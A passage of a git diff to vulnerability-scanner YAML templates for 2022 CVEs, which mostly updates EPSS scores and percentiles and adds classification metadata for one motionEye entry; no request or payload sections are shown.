cwe-id: CWE-78 epss-score: 0.97387 - epss-percentile: 0.99867 + epss-percentile: 0.99884 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index 7fb466b432..e01ea2a9bf 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-24899 cwe-id: CWE-79 - epss-score: 0.00303 - epss-percentile: 0.65765 + epss-score: 0.0031 + epss-percentile: 0.66571 cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index 875af10712..87c8f26932 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.6 cve-id: CVE-2022-24900 cwe-id: CWE-668,CWE-22 - epss-score: 0.01086 - epss-percentile: 0.82518 + epss-score: 0.01655 + epss-percentile: 0.86141 cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index c58bac8966..493f846ee9 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24990 cwe-id: CWE-306 - epss-score: 0.96102 - epss-percentile: 0.99272 + epss-score: 0.93725 + epss-percentile: 0.98832 cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index e0fa2cd327..0d4f9e111c 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25082 cwe-id: CWE-78 - epss-score: 0.02673 - epss-percentile: 0.89078 + epss-score: 0.0417 + epss-percentile: 0.91185 cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml index 742ac0bdcc..64432b22db 100644 --- a/http/cves/2022/CVE-2022-25125.yaml +++ b/http/cves/2022/CVE-2022-25125.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25125 cwe-id: CWE-89 - epss-score: 0.01029 - epss-percentile: 0.81996 + epss-score: 0.01192 + epss-percentile: 0.83572 cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index b1c4c5efb0..32f41ad12d 100644 --- a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-25216 cwe-id: CWE-22 - epss-score: 0.00979 - epss-percentile: 0.81504 + epss-score: 0.01183 + epss-percentile: 0.83508 cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index 87b134376a..f715861254 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-25323 cwe-id: CWE-79 - epss-score: 0.00132 - epss-percentile: 0.47422 + epss-score: 0.00115 + epss-percentile: 0.44833 cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index 879029043c..8c19dc0a7a 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-25356 cwe-id: CWE-91 - epss-score: 0.00437 - epss-percentile: 0.71533 + epss-score: 0.00418 + epss-percentile: 0.71183 cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml index ec9e8097c3..b9192d316f 100644 --- a/http/cves/2022/CVE-2022-2544.yaml +++ b/http/cves/2022/CVE-2022-2544.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2544 cwe-id: CWE-425 - epss-score: 0.00695 - epss-percentile: 0.77722 + epss-score: 0.00551 + epss-percentile: 0.74891 cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index 2b38bc2f86..3c14a1fe4d 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.7 cve-id: CVE-2022-2546 cwe-id: CWE-79 - epss-score: 0.00091 - epss-percentile: 0.38082 + epss-score: 0.00139 + epss-percentile: 0.49185 cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index 95d0ac2445..e867bf9299 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-25481 cwe-id: CWE-668 - epss-score: 0.00892 - epss-percentile: 0.80599 + epss-score: 0.01285 + epss-percentile: 0.84253 cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25485.yaml b/http/cves/2022/CVE-2022-25485.yaml index 9345261d3c..5a29b23c32 100644 --- a/http/cves/2022/CVE-2022-25485.yaml +++ b/http/cves/2022/CVE-2022-25485.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.8 cve-id: CVE-2022-25485 cwe-id: CWE-829 - epss-score: 0.00878 - epss-percentile: 0.80396 + epss-score: 0.00588 + epss-percentile: 0.75776 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index 0f93b77498..5e1344d147 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.8 cve-id: CVE-2022-25486 cwe-id: CWE-829 - epss-score: 0.01337 - epss-percentile: 0.84385 + epss-score: 0.01614 + epss-percentile: 0.86003 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index 2bc0823c0b..5bdd976f00 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25487 cwe-id: CWE-434 - epss-score: 0.82264 - epss-percentile: 0.97952 + epss-score: 0.88372 + epss-percentile: 0.98323 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25488.yaml b/http/cves/2022/CVE-2022-25488.yaml index 59bba62233..61191c1b8d 100644 --- a/http/cves/2022/CVE-2022-25488.yaml +++ b/http/cves/2022/CVE-2022-25488.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25488 cwe-id: CWE-89 - epss-score: 0.00942 - epss-percentile: 0.81133 + epss-score: 0.01192 + epss-percentile: 0.83572 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index 42ce0126ee..dd89f043fe 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-25489 cwe-id: CWE-79 - epss-score: 0.016 - epss-percentile: 0.85784 + epss-score: 0.00992 + epss-percentile: 0.8185 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index 4984429de6..1b09293792 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-25497 cwe-id: CWE-552 - epss-score: 0.00901 - epss-percentile: 0.807 + epss-score: 0.00611 + epss-percentile: 0.76234 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 24ff5db36a..95cb96447e 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2551 cwe-id: CWE-425 - epss-score: 0.82414 - epss-percentile: 0.9796 + epss-score: 0.79836 + epss-percentile: 0.9792 cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index a3a02f8226..af3b860bf8 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -10,9 +10,19 @@ info: - https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/ - https://github.com/ccrisan/motioneye/issues/2292 - https://nvd.nist.gov/vuln/detail/cve-2022-25568 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-25568 + cwe-id: CWE-1188 + epss-score: 0.01905 + epss-percentile: 0.87203 + cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: motioneye_project + product: motioneye shodan-query: html:"MotionEye" tags: cve,cve2023,motioneye,config diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 34ce701b43..df336bce2f 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2599 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32485 + epss-score: 0.00119 + epss-percentile: 0.45683 cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index ec36fc432b..fd269031d5 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26134 cwe-id: CWE-917 - epss-score: 0.97518 - epss-percentile: 0.99975 + epss-score: 0.97519 + epss-percentile: 0.99983 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index a8ec7b7274..078bdeb885 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26138 cwe-id: CWE-798 - epss-score: 0.97318 - epss-percentile: 0.99809 + epss-score: 0.96212 + epss-percentile: 0.99338 cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index 82ff1df4ce..987daac245 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26148 cwe-id: CWE-312 - epss-score: 0.10813 - epss-percentile: 0.94349 + epss-score: 0.22873 + epss-percentile: 0.9596 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index 5c266301bc..e17614d945 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-26159 cwe-id: CWE-425 - epss-score: 0.00665 - epss-percentile: 0.77095 + epss-score: 0.00501 + epss-percentile: 0.7363 cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 16d52cf675..ab0e85c77b 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-26233 cwe-id: CWE-22 - epss-score: 0.00482 - epss-percentile: 0.72843 + epss-score: 0.00631 + epss-percentile: 0.76659 cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 804c77b987..bc2be5afdf 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-26263 cwe-id: CWE-79 - epss-score: 0.00111 - epss-percentile: 0.4359 + epss-score: 0.00145 + epss-percentile: 0.50004 cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 16c083034d..dc2a5162da 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2627 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29012 + epss-score: 0.00078 + epss-percentile: 0.32844 cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml index e34f752428..c6745a1a0e 100644 --- a/http/cves/2022/CVE-2022-2633.yaml +++ b/http/cves/2022/CVE-2022-2633.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.2 cve-id: CVE-2022-2633 cwe-id: CWE-610,CWE-73 - epss-score: 0.04403 - epss-percentile: 0.91307 + epss-score: 0.05267 + epss-percentile: 0.92161 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 4a1b284190..8f10599049 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26352 cwe-id: CWE-22 - epss-score: 0.97466 - epss-percentile: 0.99936 + epss-score: 0.97489 + epss-percentile: 0.99964 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index d924426d4a..4cb81497d7 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-26564 cwe-id: CWE-79 - epss-score: 0.00109 - epss-percentile: 0.43197 + epss-score: 0.00129 + epss-percentile: 0.47263 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index 5f11e1487b..542c132ffd 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-26833 cwe-id: CWE-306 epss-score: 0.01194 - epss-percentile: 0.83396 + epss-percentile: 0.83586 cpe: cpe:2.3:a:openautomationsoftware:oas_platform:16.00.0112:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index bf002511fb..97fb875fc6 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.1 cve-id: CVE-2022-26960 cwe-id: CWE-22 - epss-score: 0.93292 - epss-percentile: 0.98708 + epss-score: 0.92542 + epss-percentile: 0.98677 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index 87678c5c1d..d840c6bd44 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2733 cwe-id: CWE-79 - epss-score: 0.00175 - epss-percentile: 0.53954 + epss-score: 0.00198 + epss-percentile: 0.57317 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index 97898c991a..81cb663b3b 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2756 cwe-id: CWE-918 epss-score: 0.00724 - epss-percentile: 0.78253 + epss-percentile: 0.78471 cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index 8ce344b44c..2919c9fb30 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.1 cve-id: CVE-2022-27593 cwe-id: CWE-610 - epss-score: 0.56164 - epss-percentile: 0.97221 + epss-score: 0.39295 + epss-percentile: 0.96802 cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml index a8ad2e74d7..65d979af7c 100644 --- a/http/cves/2022/CVE-2022-27849.yaml +++ b/http/cves/2022/CVE-2022-27849.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-27849 cwe-id: CWE-200 - epss-score: 0.00654 - epss-percentile: 0.76863 + epss-score: 0.00659 + epss-percentile: 0.77183 cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index be1e1d9a6e..bcfd01ff90 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-27926 cwe-id: CWE-79 - epss-score: 0.93948 - epss-percentile: 0.98805 + epss-score: 0.91058 + epss-percentile: 0.98516 cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml index d38b2d17bf..70fd0b4401 100644 --- a/http/cves/2022/CVE-2022-27927.yaml +++ b/http/cves/2022/CVE-2022-27927.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-27927 cwe-id: CWE-89 - epss-score: 0.01576 - epss-percentile: 0.85682 + epss-score: 0.03857 + epss-percentile: 0.90864 cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index 301c987633..d1405727e6 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-27984 cwe-id: CWE-89 - epss-score: 0.0148 - epss-percentile: 0.85145 + epss-score: 0.01219 + epss-percentile: 0.83768 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml index f274d866c0..54cefad79b 100644 --- a/http/cves/2022/CVE-2022-27985.yaml +++ b/http/cves/2022/CVE-2022-27985.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-27985 cwe-id: CWE-89 - epss-score: 0.01534 - epss-percentile: 0.85463 + epss-score: 0.01265 + epss-percentile: 0.84116 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28022.yaml b/http/cves/2022/CVE-2022-28022.yaml index d9126347b0..e67e5ab4c7 100644 --- a/http/cves/2022/CVE-2022-28022.yaml +++ b/http/cves/2022/CVE-2022-28022.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28022 cwe-id: CWE-89 - epss-score: 0.01144 - epss-percentile: 0.82961 + epss-score: 0.00942 + epss-percentile: 0.81347 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml index 7da35ae1ea..bae88000e5 100644 --- a/http/cves/2022/CVE-2022-28023.yaml +++ b/http/cves/2022/CVE-2022-28023.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28023 cwe-id: CWE-89 - epss-score: 0.01144 - epss-percentile: 0.82961 + epss-score: 0.00942 + epss-percentile: 0.81347 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index c04fcdd3a1..06be70981b 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28032 cwe-id: CWE-89 - epss-score: 0.01144 - epss-percentile: 0.82961 + epss-score: 0.01029 + epss-percentile: 0.8216 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index 858d89bd3d..11add48c7d 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-28079 cwe-id: CWE-89 epss-score: 0.82769 - epss-percentile: 0.97977 + epss-percentile: 0.98017 cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index 83972dfea0..ffe01ad87a 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-28080 cwe-id: CWE-89 epss-score: 0.01427 - epss-percentile: 0.84873 + epss-percentile: 0.85035 cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index beb56904e7..7a827aa3a9 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-28117 cwe-id: CWE-918 epss-score: 0.01914 - epss-percentile: 0.87092 + epss-percentile: 0.87229 cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index ce05439af3..90b613b592 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28219 cwe-id: CWE-611 - epss-score: 0.97341 - epss-percentile: 0.99825 + epss-score: 0.9738 + epss-percentile: 0.99878 cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index e791036057..b8d822257b 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-28290 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.4034 + epss-score: 0.00117 + epss-percentile: 0.45254 cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index 6b43c14b9a..6360cdbcb4 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-28363 cwe-id: CWE-79 epss-score: 0.00237 - epss-percentile: 0.61084 + epss-percentile: 0.61469 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index 066d5981a2..ee972e758c 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-28365 cwe-id: CWE-425 - epss-score: 0.00333 - epss-percentile: 0.67494 + epss-score: 0.00426 + epss-percentile: 0.71425 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index 4addfe0c88..e14444182a 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -16,8 +16,8 @@ info: cvss-score: 4.9 cve-id: CVE-2022-2863 cwe-id: CWE-22 - epss-score: 0.63285 - epss-percentile: 0.97403 + epss-score: 0.61483 + epss-percentile: 0.97425 cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml index 9ab49b3e68..b60f2ad4be 100644 --- a/http/cves/2022/CVE-2022-28923.yaml +++ b/http/cves/2022/CVE-2022-28923.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-28923 cwe-id: CWE-601 - epss-score: 0.00696 - epss-percentile: 0.7774 + epss-score: 0.00541 + epss-percentile: 0.74662 cpe: cpe:2.3:a:caddyserver:caddy:2.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index 0de3fec4bc..604907d9f8 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ 